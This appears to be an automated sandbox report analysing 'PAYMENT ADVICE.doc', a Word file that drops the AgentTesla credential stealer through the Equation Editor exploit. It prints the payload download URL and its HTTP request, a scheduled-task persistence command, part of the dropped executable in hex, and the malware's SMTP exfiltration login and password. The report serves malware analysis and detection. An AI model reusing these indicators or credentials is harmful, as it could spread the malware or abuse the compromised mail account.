Loading ...

Play interactive tourEdit tour

Windows Analysis Report PAYMENT ADVICE.doc

Overview

General Information

Sample Name:PAYMENT ADVICE.doc
Analysis ID:452655
MD5:71af183490ef5c747eb3b6a1417c8f33
SHA1:cbf5c744909fb1978d8bbadb3b1377e7b364f90d
SHA256:fd1d1d4f70fb3b258e798ba9ac66abd6ad9d9de16b4b2204f55519ea59eb7d12
Tags:doc
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected AgentTesla
Contains functionality to register a low level keyboard hook
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1320 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2764 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • merciesxdncdc.exe (PID: 3040 cmdline: C:\Users\user\AppData\Roaming\merciesxdncdc.exe MD5: E85A0E1E81ACBCEA6A0E10EEEDF32F6D)
      • schtasks.exe (PID: 2564 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JxCmQoa' /XML 'C:\Users\user\AppData\Local\Temp\tmp2E52.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • merciesxdncdc.exe (PID: 2728 cmdline: C:\Users\user\AppData\Roaming\merciesxdncdc.exe MD5: E85A0E1E81ACBCEA6A0E10EEEDF32F6D)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "max.mccanna@metaltek.me", "Password": "GODGRACE12345", "Host": "mail.privateemail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2347741002.00000000028A5000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000007.00000002.2347741002.00000000028A5000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000007.00000002.2346238680.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000007.00000002.2346238680.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.merciesxdncdc.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              7.2.merciesxdncdc.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security

                Sigma Overview

                Exploits:

                barindex
                Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 104.21.27.166, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2764, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                Sigma detected: File Dropped By EQNEDT32EXEShow sources
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2764, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okilo[1].exe

                System Summary:

                barindex
                Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\merciesxdncdc.exe, CommandLine: C:\Users\user\AppData\Roaming\merciesxdncdc.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\merciesxdncdc.exe, NewProcessName: C:\Users\user\AppData\Roaming\merciesxdncdc.exe, OriginalFileName: C:\Users\user\AppData\Roaming\merciesxdncdc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2764, ProcessCommandLine: C:\Users\user\AppData\Roaming\merciesxdncdc.exe, ProcessId: 3040

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus detection for URL or domainShow sources
                Source: http://maritradeshipplng.com/wayss/okilo.exeAvira URL Cloud: Label: malware
                Found malware configurationShow sources
                Source: 7.2.merciesxdncdc.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "max.mccanna@metaltek.me", "Password": "GODGRACE12345", "Host": "mail.privateemail.com"}
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okilo[1].exeReversingLabs: Detection: 23%
                Source: C:\Users\user\AppData\Roaming\JxCmQoa.exeReversingLabs: Detection: 23%
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeReversingLabs: Detection: 23%
                Multi AV Scanner detection for submitted fileShow sources
                Source: PAYMENT ADVICE.docReversingLabs: Detection: 26%
                Machine Learning detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okilo[1].exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\JxCmQoa.exeJoe Sandbox ML: detected

                Exploits:

                barindex
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: global trafficDNS query: name: maritradeshipplng.com
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.27.166:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.27.166:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.54.122.60:587
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Jul 2021 15:30:49 GMTContent-Type: application/octet-streamContent-Length: 918016Connection: keep-aliveLast-Modified: Thu, 22 Jul 2021 07:16:32 GMTETag: "e0200-5c7b11105d9f8"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A4WScKmZaLuRICl5Vg8CWsrWHYZxehHOeC9R%2Fs8kP8xwh%2F0GSl%2F6oRcZSoMzklCMUv%2B2QB5AuT7aOfp81JZ0a8ZaFRiQxuOa%2F2x4XKv8LFBLHelWLzwkMQ8813jnYWu9lWjtKT5SQCE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 672db66479d040e9-LHRalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 79 1a f9 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 56 0c 00 00 a8 01 00 00 00 00 00 6e 75 0c 00 00 20 00 00 00 80 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0e 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 75 0c 00 4b 00 00 00 00 a0 0c 00 14 a3 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 55 0c 00 00 20 00 00 00 56 0c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 18 00 00 00 00 80 0c 00 00 02 00 00 00 5a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 14 a3 01 00 00 a0 0c 00 00 a4 01 00 00 5c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0e 00 00 02 00 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELy`Vnu @ @ uK` H.texttU V `.sdata
                Source: Joe Sandbox ViewIP Address: 104.21.27.166 104.21.27.166
                Source: Joe Sandbox ViewIP Address: 198.54.122.60 198.54.122.60
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.54.122.60:587
                Source: global trafficHTTP traffic detected: GET /wayss/okilo.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: maritradeshipplng.comConnection: Keep-Alive
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B5F1B80B-61BE-41BF-89DB-AF92964D1C77}.tmpJump to behavior
                Source: global trafficHTTP traffic detected: GET /wayss/okilo.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: maritradeshipplng.comConnection: Keep-Alive
                Source: merciesxdncdc.exe, 00000007.00000002.2351540705.00000000061F0000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: unknownDNS traffic detected: queries for: maritradeshipplng.com
                Source: merciesxdncdc.exe, 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: merciesxdncdc.exe, 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                Source: merciesxdncdc.exe, 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmpString found in binary or memory: http://IXudBJ.com
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
                Source: merciesxdncdc.exe, merciesxdncdc.exe, 00000007.00000000.2140079675.00000000009D2000.00000020.00020000.sdmp, merciesxdncdc.exe.2.drString found in binary or memory: http://api.twitter.com/1/direct_messages.xml?since_id=
                Source: merciesxdncdc.exe, 00000007.00000003.2226188928.00000000062DF000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
                Source: merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
                Source: merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                Source: merciesxdncdc.exe, 00000007.00000002.2351633148.0000000006293000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: merciesxdncdc.exe, 00000007.00000002.2346420413.0000000000552000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
                Source: merciesxdncdc.exe, 00000007.00000002.2351571827.000000000621B000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: merciesxdncdc.exe, 00000007.00000002.2351571827.000000000621B000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: merciesxdncdc.exe, 00000007.00000002.2351571827.000000000621B000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: merciesxdncdc.exe, 00000007.00000002.2346447989.000000000057D000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
                Source: merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
                Source: merciesxdncdc.exe, 00000007.00000002.2351540705.00000000061F0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: merciesxdncdc.exe, 00000007.00000002.2351571827.000000000621B000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
                Source: merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                Source: merciesxdncdc.exe, 00000007.00000002.2351633148.0000000006293000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                Source: merciesxdncdc.exe, 00000007.00000003.2227114582.0000000006293000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: merciesxdncdc.exe, 00000007.00000002.2346354699.00000000004DE000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab$
                Source: merciesxdncdc.exe, 00000007.00000002.2346354699.00000000004DE000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?2c66211f8785b
                Source: merciesxdncdc.exe, 00000007.00000002.2346420413.0000000000552000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enW
                Source: merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
                Source: merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
                Source: merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
                Source: merciesxdncdc.exe, 00000007.00000002.2347296041.00000000025A6000.00000004.00000001.sdmpString found in binary or memory: http://mail.privateemail.com
                Source: merciesxdncdc.exe, 00000007.00000002.2351633148.0000000006293000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: merciesxdncdc.exe, 00000007.00000002.2351540705.00000000061F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: merciesxdncdc.exe, 00000007.00000002.2351540705.00000000061F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: merciesxdncdc.exe, 00000007.00000002.2351540705.00000000061F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: merciesxdncdc.exe, 00000007.00000002.2351540705.00000000061F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: merciesxdncdc.exe, 00000007.00000002.2351571827.000000000621B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: merciesxdncdc.exe, 00000007.00000002.2351571827.000000000621B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
                Source: merciesxdncdc.exe, 00000007.00000002.2351633148.0000000006293000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
                Source: merciesxdncdc.exe, 00000007.00000002.2351007158.0000000005D80000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: merciesxdncdc.exe, 00000007.00000002.2354088595.0000000007970000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                Source: merciesxdncdc.exe, merciesxdncdc.exe, 00000007.00000000.2140079675.00000000009D2000.00000020.00020000.sdmp, merciesxdncdc.exe.2.drString found in binary or memory: http://twitter.com/statuses/user_timeline.xml?screen_name=
                Source: merciesxdncdc.exe, 00000007.00000002.2351007158.0000000005D80000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at0E
                Source: merciesxdncdc.exe, 00000007.00000003.2227055337.000000000628C000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
                Source: merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
                Source: merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
                Source: merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com0
                Source: merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
                Source: merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
                Source: merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.certifikat.dk/repository0
                Source: merciesxdncdc.exe, 00000007.00000003.2226349491.00000000062A9000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
                Source: merciesxdncdc.exe, 00000007.00000003.2226188928.00000000062DF000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
                Source: merciesxdncdc.exe, 00000007.00000003.2226188928.00000000062DF000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
                Source: merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
                Source: merciesxdncdc.exe, 00000007.00000002.2351571827.000000000621B000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: merciesxdncdc.exe, 00000007.00000002.2351571827.000000000621B000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: merciesxdncdc.exe, 00000007.00000003.2226349491.00000000062A9000.00000004.00000001.sdmpString found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
                Source: merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                Source: merciesxdncdc.exe, 00000007.00000003.2227055337.000000000628C000.00000004.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
                Source: merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
                Source: merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
                Source: merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
                Source: merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
                Source: merciesxdncdc.exe, 00000007.00000003.2226188928.00000000062DF000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/net1.crl0
                Source: merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://www.firmaprofesional.com0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0=
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
                Source: merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
                Source: merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
                Source: merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
                Source: merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/current.crl0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
                Source: merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
